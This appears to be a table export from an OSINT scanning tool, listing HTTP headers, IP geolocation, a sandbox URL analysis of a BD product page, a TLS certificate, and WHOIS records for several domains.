| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c572ccdc9c6e26c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:45:07 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8001::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8001::153 |
| 2023-05-12 02:54:34 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | CloudFlare CloudFlare Load Balancer | 104.21.71.14 |
| 2023-05-12 02:51:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://o.length/4-2;var', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-site/resources/image/icons/arrow-forward-boosted-blue.svg);background-position:0;background-repeat:no-repeat;content', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-dependencies.lc-a8a835b60a51c1a16bfe62bc508a0553-lc.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-dependencies.lc-c134f778cda2725b23581fb9bbc5b854-lc.min.css', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-site.lc-bd09710473c40d28e121912e717b2ace-lc.min.css', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-base.lc-bedc8b6f121e0f7199ca3e44738c97cd-lc.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://p.height/2);r&&a.is(r', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://t.duration/o,r=0,l=1,s=i.queue().length;for(!n&&i.is', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-base.lc-f16c560e3c515940ffc44d9c4abc3ec3-lc.min.css', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.bd.com/en-us/products-and-solutions/products/product-families/bd-alaris-guardrails-suite-mx#eifuresources', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_e98_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3736"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e98_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_e98_IE_EarlyTabStart_0xbdc_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e98_ConnHashTable<3736>_HashTable_Mutex"\n "IsoScope_e98_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e98_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"151.101.1.229:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "104.18.11.207:443"\n "104.17.70.206:443"\n "104.19.188.97:443"\n "13.227.74.80:443"\n "185.199.108.153:443"\n "13.227.74.101:443"\n "172.64.144.98:443"\n "23.39.0.132:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accessibilityserver.org"\n "c.go-mpulse.net"\n "cdn.cookielaw.org"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "geolocation.onetrust.com"\n "go.bd.com"\n "malsup.github.io"\n "stackpath.bootstrapcdn.com"\n "tag.demandbase.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a href="https://www.linkedin.com/company/bd1?trk=biz-companies-cym" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/linkedin-black.svg" alt="Linked In" title="Linked In"/></a>" (Indicator: "dir "; File: "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "<a href="https://www.facebook.com/BectonDickinsonandCo?ref=bookmarks" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/fb-black.svg" alt="Facebook" title="Facebook"/></a>" (Indicator: "dir "; File: "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "<a href="https://twitter.com/BDandCo" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/Twitter-black.svg" alt="Twitter" title="Twitter"/></a>" (Indicator: "dir "; File: "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "<a href="https://www.youtube.com/channel/UCPGmutY43EjP_3ijOugNGnA" target="_blank"><img src="/content/dam/bdcom-assets/en/en-us/images/graphic/icon/youtube-black.svg" alt="Youtube" title="Youtube"/></a>" (Indicator: "dir "; File: "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources")\n Found string "* Copyright 2011-2021 Twitter, Inc." (Indicator: "dir "; File: "bootstrap.min_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"error_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPCM) density 118x118 segment length 16 progressive precision 8 5000x3337 components 3" and extension "jpg"\n "favicon_16_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-8701', u'name': u'Chained signature (with api-8700...). Detects file write then launch as executable', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1574', u'relevance': 8, u'threat_level': 0, u'type': 6, u'description': None}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "error_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPCM) density 118x118 segment length 16 progressive precision 8 5000x3337 components 3"- [targetUID: N/A]\n "clientlib-site.lc-bd09710473c40d28e121912e717b2ace-lc.min_1_.css" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "index.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "clientlib-site.lc-e51d492d6388e3a14ab136b2a7880775-lc.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "otBannerSdk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery-ui.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "clientlib-base.lc-f16c560e3c515940ffc44d9c4abc3ec3-lc.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "FSAlbertPro-Bold_1_.ttf" has type "TrueType Font data 16 tables 1st "GPOS" 30 names Macintosh Copyright (c) 2009 by Fontsmith Ltd. All rights reserved. This font may not be altered in any w"- [targetUID: N/A]\n "forms2.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "FSAlbertPro-Light_1_.ttf" has type "TrueType Font data 16 tables 1st "GPOS" 34 names Macintosh Copyright (c) 2009 by Fontsmith Ltd. All rights reserved. This font may not be altered in any w"- [targetUID: N/A]\n "22KRU-FA6KB-X6CHV-34PWY-E76NS_1_.js" has type "C source ASCII text with very long lines"- [targetUID: N/A]\n "FSAlbertPro_1_.ttf" has type "TrueType Font data 16 tables 1st "GPOS" 30 names Macintosh Copyright (c) 2009 by Fontsmith Ltd. All rights reserved. This font may not be altered in any w"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "urlref_httpswww.bd.comen-usproducts-and-solutionsproductsproduct-familiesbd-alaris-guardrails-suite-mx#eifuresources" has type "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators"- [targetUID: N/A]\n "en_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "jquery.lc-7842899024219bcbdb5e72c946870b79-lc.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "raphael-min_1_.j | 185.199.108.153 |
| 2023-05-12 02:46:53 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
51:bc:8d:7a:19:49:b5:11:f4:b9:09:41:b5:bf:9e:b6:a0:1f:
30:6c:d0:86:d8:2e:1c:f6:c2:f3:8a:e9:28:07:3c:4c:1b:5d:
f4:93:c1:07:2c:53:ba:36:23:93:d1:2b:ae:40:d0:d7:9a:3d:
52:13:07:ac:5a:f9:bc:8e:9a:26:48:2d:63:da:42:87:4d:b8:
79:91:2d:a5:15:c9:8f:18:d0:19:dc:82:a0:c9:2f:ff:14:7f:
6e:d9:7c:10:fd:42:c5:1f:9f:69:db:a2:e3:f6:77:ca:6b:4d:
70:8d:c7:08:12:a2:cb:2b:e2:0f:fa:b5:ad:d0:98:5b:e2:5d:
54:f6:0b:28:1a:42:4d:c5:06:75:82:0f:6a:07:8d:19:7b:08:
12:7b:65:35:ae:e0:fb:30:c6:19:89:90:6c:f3:9f:d1:68:80:
fa:bb:16:fe:59:7b:6b:32:af:7b:3b:c0:6b:66:67:55:6e:9c:
27:ae:59:b7:71:9d:56:92:7b:0c:2b:27:d8:38:32:c8:ff:2f:
02:3f:56:f2:68:67:dc:8c:2f:a9:bc:e8:3a:f8:d6:0d:e4:fc:
ea:65:23:2c:d6:31:a2:34:ab:8b:fc:76:7c:26:2d:87:ae:ee:
a9:61:86:49:d1:02:02:98:49:50:4a:f8:24:91:f5:5d:f3:f7:
98:5f:57:37
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-served-by: cache-ewr18167-EWR | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | Czech Republic | Domain Name: DONTKILLMYAPP.COM
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:34:59Z
Creation Date: 2018-12-19T04:28:10Z
Registry Expiry Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc. Danmark - Filial af Ascio technologies, Inc. USA
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +1.4165350123
Domain Status: ok https://icann.org/epp#ok
Name Server: NS.WEDOS.COM
Name Server: NS.WEDOS.CZ
Name Server: NS.WEDOS.EU
Name Server: NS.WEDOS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: dontkillmyapp.com
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:35:59Z
Creation Date: 2018-12-19T00:00:00Z
Registrar Registration Expiration Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +44 (20) 81583881
Domain Status: OK https://icann.org/epp#ok
Registry Registrant ID: Not Disclosed
Registrant Name: Not Disclosed
Registrant Organization: Not Disclosed
Registrant Street: Not Disclosed
Registrant City: Not Disclosed
Registrant State/Province:
Registrant Postal Code: Not Disclosed
Registrant Country: CZ
Registrant Phone: Not Disclosed
Registrant Phone Ext: Not Disclosed
Registrant Fax: Not Disclosed
Registrant Fax Ext: Not Disclosed
Registrant Email: https://whoiscontact.ascio.com?domainname=dontkillmyapp.com
Registry Admin ID: Not Disclosed
Admin Name: Not Disclosed
Admin Organization: Not Disclosed
Admin Street: Not Disclosed
Admin City: Not Disclosed
Admin State/Province: Not Disclosed
Admin Postal Code: Not Disclosed
Admin Country: Not Disclosed
Admin Phone: Not Disclosed
Admin Phone Ext: Not Disclosed
Admin Fax: Not Disclosed
Admin Fax Ext: Not Disclosed
Admin Email: Not Disclosed
Registry Tech ID: Not Disclosed
Tech Name: Not Disclosed
Tech Organization: Not Disclosed
Tech Street: Not Disclosed
Tech City: Not Disclosed
Tech State/Province: Not Disclosed
Tech Postal Code: Not Disclosed
Tech Country: Not Disclosed
Tech Phone: Not Disclosed
Tech Phone Ext: Not Disclosed
Tech Fax: Not Disclosed
Tech Fax Ext: Not Disclosed
Tech Email: Not Disclosed
Name Server: ns.wedos.net
Name Server: ns.wedos.cz
Name Server: ns.wedos.eu
Name Server: ns.wedos.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf
>>> Last update of WHOIS database: 2023-05-12T03:09:25Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in Ascio Technologies' WHOIS database is provided
by Ascio Technologies for information purposes only. By submitting
a WHOIS query, you agree that you will use this data only for lawful
purpose. In addition, you agree not to:
(a) use the data to allow, enable, or otherwise support any marketing
activities, regardless of the medium used. Such media include but are
not limited to e-mail, telephone, facsimile, postal mail, SMS, and
wireless alerts; or
(b) use the data to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.
(c) sell or redistribute the data except insofar as it has been
incorporated into a value-added product or service that does not permit
the extraction of a substantial portion of the bulk data from the value-added
product or service for use by other parties.
Ascio Technologies reserves the right to modify these terms at any time.
Ascio Technologies cannot guarantee the accuracy of the data provided.
By accessing and using Ascio Technologies WHOIS service, you agree to these terms.
|
| 2023-05-12 02:44:18 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | nwapi.battleb0t.xyz |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | PERFECT PRIVACY, LLC | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
